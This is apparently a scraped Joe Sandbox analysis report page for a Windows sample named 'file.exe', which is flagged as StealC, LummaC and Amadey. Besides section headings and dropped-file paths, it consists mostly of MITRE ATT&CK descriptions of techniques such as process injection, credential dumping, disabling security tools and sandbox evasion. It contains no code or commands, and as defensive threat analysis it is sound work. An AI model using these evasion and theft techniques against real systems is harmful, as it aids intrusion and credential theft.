Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\add[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\key[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre